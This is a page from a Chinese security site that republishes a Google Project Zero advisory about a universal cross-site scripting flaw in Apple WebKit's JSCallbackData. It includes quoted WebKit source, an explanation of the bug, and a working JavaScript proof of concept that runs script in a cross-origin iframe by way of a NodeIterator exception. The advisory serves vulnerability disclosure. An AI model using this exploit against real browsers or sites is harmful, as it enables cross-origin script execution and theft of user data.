首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Apple Webkit - 'JSCallbackData' Universal Cross-Site Scripting 来源：Google Security Research 作者：Google 发布时间：2017-04-05   <!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1068   Here is the definition of |JSCallbackData| class. This class is used to call a javascript function from a DOM object.   class JSCallbackDataStrong : public JSCallbackData { public:     JSCallbackDataStrong(JSC::JSObject* callback, void*)         : m_callback(callback->globalObject()->vm(), callback)     {     }       JSC::JSObject* callback() { return m_callback.get(); }     JSDOMGlobalObject* globalObject() { return JSC::jsCast<JSDOMGlobalObject*>(m_callback->globalObject()); }       JSC::JSValue invokeCallback(JSC::MarkedArgumentBuffer& args, CallbackType callbackType, JSC::PropertyName functionName, NakedPtr<JSC::Exception>& returnedException)     {         return JSCallbackData::invokeCallback(callback(), args, callbackType, functionName, returnedException);     }   private:     JSC::Strong<JSC::JSObject> m_callback; };   JSValue JSCallbackData::invokeCallback(JSObject* callback, MarkedArgumentBuffer& args, CallbackType method, PropertyName functionName, NakedPtr<JSC::Exception>& returnedException) {     ASSERT(callback);       auto* globalObject = JSC::jsCast<JSDOMGlobalObject*>(callback->globalObject());  <<<---------- (1)     ASSERT(globalObject);       ExecState* exec = globalObject->globalExec();     JSValue function;     CallData callData;     CallType callType = CallType::None;       if (method != CallbackType::Object) {         function = callback;         callType = callback->methodTable()->getCallData(callback, callData);     }     if (callType == CallType::None) {         if (method == CallbackType::Function) {             returnedException = JSC::Exception::create(exec->vm(), createTypeError(exec));  <<<---------- (2)             return JSValue();         }         ...     }     ... }   But |JSCallbackData::invokeCallback| method obtains the |ExecState| object from the callback object. So if we invoke |JSCallbackData::invokeCallback| method with the different origin's window as |callback|, an exception object will be created from the different domain's javascript context.   PoC: -->   "use strict";   let f = document.body.appendChild(document.createElement("iframe")); f.onload = () => {     f.onload = null;       try {         let iterator = document.createNodeIterator(document, NodeFilter.SHOW_ALL, f.contentWindow);         iterator.nextNode();     } catch (e) {         e.constructor.constructor("alert(location)")();     } };   f.src = "https://abc.xyz/";   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Apple WebKit 10.0.2(12602.3.12 ·Apple Webkit - Universal Cross ·macOS/iOS Kernel 10.12.3 (16D3 ·Apple WebKit 10.0.2(12602.3.12 ·macOS Kernel 10.12.2 (16C67) - ·Apple WebKit 10.0.2(12602.3.12 ·macOS Kernel 10.12.3 (16D32) - ·Apple WebKit 10.0.2 - HTMLInpu ·macOS/iOS Kernel 10.12.3 (16D3 ·Apple WebKit - 'RenderLayer' U ·macOS/iOS Kernel 10.12.3 (16D3 ·Apple WebKit - Negative-Size m   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved